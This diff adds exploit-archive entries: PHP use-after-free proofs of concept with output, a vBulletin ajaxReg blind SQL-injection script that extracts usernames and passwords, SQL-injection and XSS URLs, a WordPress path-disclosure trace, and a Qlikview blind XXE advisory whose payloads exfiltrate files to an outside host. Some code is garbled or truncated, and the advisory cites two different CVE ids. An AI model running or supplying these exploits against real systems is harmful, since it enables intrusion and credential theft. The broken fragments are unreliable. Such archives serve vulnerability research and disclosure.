+Proof of Concept Exploit +------------ +The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12. 
+ + +ryat = 1; + } +} + +$fakezval = ptr2str(1122334455); +$fakezval .= ptr2str(0); +$fakezval .= "\x00\x00\x00\x00"; +$fakezval .= "\x01"; +$fakezval .= "\x00"; +$fakezval .= "\x00\x00"; + +$inner = 'x:i:1;O:8:"stdClass":0:{},i:1;;m:a:0:{}'; +$exploit = 'a:5:{i:0;i:1;i:1;C:16:"SplObjectStorage":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;R:6;i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}'; + +$data = unserialize($exploit); + +var_dump($data); + +function ptr2str($ptr) +{ + $out = ''; + for ($i = 0; $i < 8; $i++) { + $out .= chr($ptr & 0xff); + $ptr >>= 8; + } + return $out; +} + +?> + + +Test the PoC on the command line: + + +$ php uafpoc.php +array(5) { + [0]=> + int(1) + [1]=> + &int(1) + [2]=> + object(obj)#3 (1) { + ["ryat"]=> + &int(1) + } + [3]=> + int(1122334455) <=== so we can control the memory and create fake ZVAL :) + [4]=> + string(24) "?v?B????" +} diff --git a/platforms/php/dos/38123.txt b/platforms/php/dos/38123.txt new file mode 100755 index 000000000..e2ae315af --- /dev/null +++ b/platforms/php/dos/38123.txt 
@@ -0,0 +1,125 @@ +Use After Free Vulnerabilities in Session Deserializer + +Taoguang Chen <[@chtg](http://github.com/chtg)> +Write Date: 2015.8.9 +Release Date: 2015.9.4 + +Multiple use-after-free vulnerabilities were discovered in session deserializer (php/php_binary/php_serialize) that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. + +Affected Versions +------------ +Affected is PHP 5.6 < 5.6.13 +Affected is PHP 5.5 < 5.5.29 +Affected is PHP 5.4 < 5.4.45 + +Credits +------------ +This vulnerability was disclosed by Taoguang Chen. + +Description +------------ + +PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */ +{ + + ... + + PHP_VAR_UNSERIALIZE_INIT(var_hash); + + p = val; + + while (p < endptr) { + + ... + + if (has_value) { + ALLOC_INIT_ZVAL(current); + if (php_var_unserialize(¤t, (const unsigned char **) &q, +(const unsigned char *) endptr, &var_hash TSRMLS_CC)) { + php_set_session_var(name, namelen, current, &var_hash TSRMLS_CC); + } + zval_ptr_dtor(¤t); + } + PS_ADD_VARL(name, namelen); +skip: + efree(name); + + p = q; + } +break_outer_loop: + + PHP_VAR_UNSERIALIZE_DESTROY(var_hash); + + return SUCCESS; +} + + +When session deserializer (php/php_binary) deserializing multiple data +it will call to php_var_unserialize() multiple times. So we can create +ZVAL and free it via the php_var_unserialize() with a crafted +serialized string, and also free the memory (reduce the reference +count of the ZVAL to zero) via zval_ptr_dtor() with deserialize two +identical session data, then the next call to php_var_unserialize() +will still allow to use R: or r: to set references to that already +freed memory. It is possible to use-after-free attack and execute +arbitrary code remotely. 
+ +In some other cases, session deserializer +(php/php_binary/php_serialize) may also lead to use-after-free +vulnerabilities: i) via crafted Serializable::unserialize() ii) via +unserialize()'s callback function and zend_lookup_class() call a +crafted __autoload(). + +Proof of Concept Exploit +------------ +The PoC works on standard MacOSX 10.11 installation of PHP 5.4.44. + + +>= 8; + } + return $out; +} + +?> + + +Test the PoC on the command line: + + +$ php uafpoc.php +array(2) { + ["ryat"]=> + NULL + ["chtg"]=> + array(1) { + [0]=> + int(1122334455) <=== so we can control the memory and create fake ZVAL :) + } +} + diff --git a/platforms/php/dos/38125.txt b/platforms/php/dos/38125.txt new file mode 100755 index 000000000..33a502523 --- /dev/null +++ b/platforms/php/dos/38125.txt 
@@ -0,0 +1,179 @@ +Use After Free Vulnerabilities in unserialize() + +Taoguang Chen <[@chtg](http://github.com/chtg)> +Write Date: 2015.7.31 +Release Date: 2015.9.4 + +Multiple use-after-free vulnerabilities were discovered in unserialize() with Serializable class that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely. + +Affected Versions +------------ +Affected is PHP 5.6 < 5.6.12 +Affected is PHP 5.5 < 5.5.28 +Affected is PHP 5.4 < 5.4.44 + +Credits +------------ +This vulnerability was disclosed by Taoguang Chen. + +Description +------------ + + if (ce->unserialize == NULL) { + zend_error(E_WARNING, "Class %s has no unserializer", ZSTR_VAL(ce->name)); + object_init_ex(rval, ce); + } else if (ce->unserialize(rval, ce, (const unsigned char*)*p, +datalen, (zend_unserialize_data *)var_hash) != SUCCESS) { + return 0; + } + + (*p) += datalen; + + return finish_nested_data(UNSERIALIZE_PASSTHRU); + + +The unserialize() with Serializable class lead to various problems. + +i) Free the memory via crafted Serializable class + + +data); + } + function unserialize($data) { + $this->data = unserialize($data); + $this->data = 1; + } +} + +?> + + +ii) Free the memory via the process_nested_data() with a invalid +serialized string + + +static inline int process_nested_data(UNSERIALIZE_PARAMETER, HashTable +*ht, long elements, int objprops) +{ + while (elements-- > 0) { + zval *key, *data, **old_data; + + ... + + ALLOC_INIT_ZVAL(data); + + if (!php_var_unserialize(&data, p, max, var_hash TSRMLS_CC)) { + zval_dtor(key); + FREE_ZVAL(key); + zval_dtor(data); + FREE_ZVAL(data); <=== free the memory + return 0; + } + + +iii) Free the memory via the var_push_dtor_no_addref() with the var_destroy(). + + +PHPAPI void var_destroy(php_unserialize_data_t *var_hashx) +{ + + ... + + while (var_hash) { + for (i = 0; i < var_hash->used_slots; i++) { + zval_ptr_dtor(&var_hash->data[i]); <=== free the memory + } + + ... 
+ +PHPAPI int php_var_unserialize(UNSERIALIZE_PARAMETER) +{ + + ... + + if (*rval != NULL) { + var_push_dtor_no_addref(var_hash, rval); + } + *rval = *rval_ref; + + +We can create ZVAL and free it via Serializable::unserialize. However +the unserialize() will still allow to use R: or r: to set references +to that already freed memory. It is possible to use-after-free attack +and execute arbitrary code remotely. + +Proof of Concept Exploit +------------ +The PoC works on standard MacOSX 10.11 installation of PHP 5.4.43. + + +>= 8; + } + return $out; +} + +class obj implements Serializable { + var $data; + function serialize() { + return serialize($this->data); + } + function unserialize($data) { + $this->data = unserialize($data); +// i) +// $this->data = '1'; + } +} + +?> + + +Test the PoC on the command line: + + +$ php uafpoc.php +array(2) { + [0]=> + object(obj)#1 (1) { + ["data"]=> + bool(false) + } + [1]=> + int(1122334455) <=== so we can control the memory and create fake ZVAL :) +} diff --git a/platforms/php/webapps/38111.txt b/platforms/php/webapps/38111.txt new file mode 100755 index 000000000..c3745ec6b --- /dev/null +++ b/platforms/php/webapps/38111.txt 
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/56860/info
+
+The Simple Gmail Login plugin for Wordpress is prone to an information-disclosure vulnerability.
+
+Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
+
+Simple Gmail Login 1.1.3 and prior are vulnerable.
+
+Fatal error: Uncaught exception 'Exception' with message
+'DateTimeZone::__construct() [datetimezone.--construct]: Unknown or bad timezone ()' in
+C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php:229
+Stack trace: #0
+C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(229):
+DateTimeZone->__construct('') #1
+C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(210):
+SimpleGmail_Plugin->log('Plugin activate...', false) #2 [internal
+function]: SimpleGmail_Plugin->activate('') #3
+C:\xampp\htdocs\wordpress\wp-includes\plugin.php(403):
+call_user_func_array(Array, Array) #4
+C:\xampp\htdocs\wordpress\wp-admin\plugins.php(157):
+do_action('activate_simple...') #5 {main} thrown in C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php
+on line 229
diff --git a/platforms/php/webapps/38112.txt b/platforms/php/webapps/38112.txt
new file mode 100755
index 000000000..0891ea715
--- /dev/null
+++ b/platforms/php/webapps/38112.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56862/info
+
+FOOT Gestion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?page=contacter.php&id=-1 union select 1,2--%20
\ No newline at end of file
diff --git a/platforms/php/webapps/38113.php b/platforms/php/webapps/38113.php
new file mode 100755
index 000000000..79950a200
--- /dev/null
+++ b/platforms/php/webapps/38113.php
@@ -0,0 +1,86 @@
+source: http://www.securityfocus.com/bid/56877/info
+
+The ajaxReg module for vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+#!/usr/bin/php
+ [userid] [key]".
+ "\n[+] Ex. : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
+ "\n[+] Note. : Its a 0day exploit\n\n";
+ exit ();
+}
+
+function check ($hostname, $path, $field, $pos, $usid, $char)
+{
+ $char = ord ($char);
+ $inj = 'ajax.php?do=CheckUsername¶m=';
+ $inj.=
+"admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
+ $culr = $hostname.$path.$inj;
+ $curl = curl_init();
+ curl_setopt ($curl, CURLOPT_URL, $culr );
+ curl_setopt($curl, CURLOPT_HEADER, 1);
+ curl_setopt($curl, CURLOPT_VERBOSE, 0);
+ ob_start();
+ curl_exec ($curl);
+ curl_close ($curl);
+ $con = ob_get_contents();
+ ob_end_clean();
+ if(eregi('Invalid',$con))
+ return true;
+ else
+ return false;
+}
+
+
+function brutechar ($hostname, $path, $field, $usid, $key)
+{
+ $pos = 1;
+ $chr = 0;
+ while ($chr < strlen ($key))
+ {
+ if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
+ {
+ echo $key [$chr];
+ $chr = -1;
+ $pos++;
+ }
+ $chr++;
+ }
+}
+
+
+if (count ($argv) != 4)
+ usage ();
+
+$hostname = $argv [1];
+$path = $argv [2];
+$usid = $argv [3];
+$key = $argv [4];
+if (empty ($key))
+ $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+
+echo "[+] Username: ";
+brutechar ($hostname, $path, "username", $usid, $key);
+echo "\n[+] Password: ";
+brutechar ($hostname, $path, "password", $usid, $key);
+echo "\n[+] Done..";
+echo "\n[+] It's not fake, its real.";
+# word to 1337day.com, stop scaming me
+
+?>
diff --git a/platforms/php/webapps/38115.txt b/platforms/php/webapps/38115.txt
new file mode 100755
index 000000000..827879130
--- /dev/null
+++ b/platforms/php/webapps/38115.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56882/info
+
+Simple Invoices is prone to multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+[http://]www.example.com/simpleinvoices/index.php?module=invoices&view=manage&having=%3C/script%3E%3Cscript%3Ealert%28%27POC%20XSS%27%29;%3C/script%3E%3Cscript%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/38119.html b/platforms/php/webapps/38119.html
new file mode 100755
index 000000000..73ca9ba0d
--- /dev/null
+++ b/platforms/php/webapps/38119.html
@@ -0,0 +1,60 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/xml/webapps/38118.txt b/platforms/xml/webapps/38118.txt
new file mode 100755
index 000000000..a5d474f88
--- /dev/null
+++ b/platforms/xml/webapps/38118.txt
@@ -0,0 +1,99 @@
+Exploit Title: Qlikview blind XXE security vulnerability
+Product: Qlikview
+Vulnerable Versions: v11.20 SR11 and previous versions
+Tested Version: v11.20 SR4
+Advisory Publication: 08/09/2015
+Latest Update: 08/09/2015
+Vulnerability Type: Improper Restriction of XML External Entity Reference [CWE-611]
+CVE Reference: CVE-2015-3623
+Credit: Alex Haynes
+
+Advisory Details:
+
+
+(1) Vendor & Product Description
+--------------------------------
+
+Vendor: QLIK
+
+Product & Version:
+QlikView v11.20 SR4
+
+Vendor URL & Download:
+http://www.qlik.com/us/explore/products/qlikview
+
+Product Description:
+"The QlikView Business Discovery platform delivers true self-service BI that empowers business users by driving innovative decision-making."
+
+
+(2) Vulnerability Details:
+--------------------------
+The Qlikview platform is vulnerable to XML External Entity (XXE) vulnerabilities. More specifically, the platform
+is susceptible to DTD parameter injections, which are also "blind" as the server feeds back no visual response. These vulnerabilities can be exploited
+to force Server Side Request Forgeries (SSRF)in multiple protocols, as well as reading and extracting arbitrary files on the server directly.
+
+Proof of concept for XXE [CVE-2015-5361]:
+-----------------------------------------
+URL: https:///AccessPoint.aspx
+
+Attack Pattern for SSRF:
+------------------------
+In POST body:
+
+
+
+%external;]>
+
+OR simply
+
+
+
+As this is a blind XXE, you will see no response from server, but yourserver.com will receive the HTTP request from the Qlikview server. Also works with FTP and HTTPS protocols.
+
+Attack Pattern for reading and extracting arbitrary files:
+------------------------------------------
+In POST body:
+
+
+
+
+%dtd;
+%send;
+]]>
+
+The test.dtd file on yourserver.com will need to contain the following:
+
+Test.dtd
+--------
+">
+%all;
+
+As the response is blind, you will see no response from the server, but yourserver.com will receive the file contents as part of the URL in lieu of the %remote parameter.
+
+
+(3) Advisory Timeline:
+----------------------
+29/04/2015 - First Contact informing vendor of vulnerability
+30/04/2015 - Response requesting details of vulnerability. Details sent
+05/05/2015 - Vendor indicates issue is under investigation.
+06/05/2015 - Vendor confirms vulnerability and has started working on resolving the issue.
+20/05/2015 - Vendor confirms root cause has been identified and patch is under internal testing.
+08/06/2015 - Vendor confirms patch ready and requests 90 day restraint on vulnerability release to give clients time to patch.
+10/06/2015 - Patch 11.20 SR12 released, fixing the vulnerability
+08/09/2015 - Public disclosure of vulnerability.
+
+
+(4)Solution:
+------------
+Upgrade to QV11.20 SR12 will correct the vulnerability.
+
+
+(5) Credits:
+------------
+Discovered by Alex Haynes
+
+References:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3623
+http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3623
\ No newline at end of file
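Review bot: The CVE identifier is inconsistent within this advisory: the header line `CVE Reference: CVE-2015-3623` and both URLs under References cite CVE-2015-3623, while the proof-of-concept heading reads `Proof of concept for XXE [CVE-2015-5361]:`. One of the two is presumably a typo; the page does not establish which, so the PoC heading should be aligned with the header and References (or the discrepancy explained), since defenders track patch status by CVE id. The fixed build named in the Solution section, `QV11.20 SR12`, does agree with the `10/06/2015 - Patch 11.20 SR12 released` timeline entry, so that part is consistent.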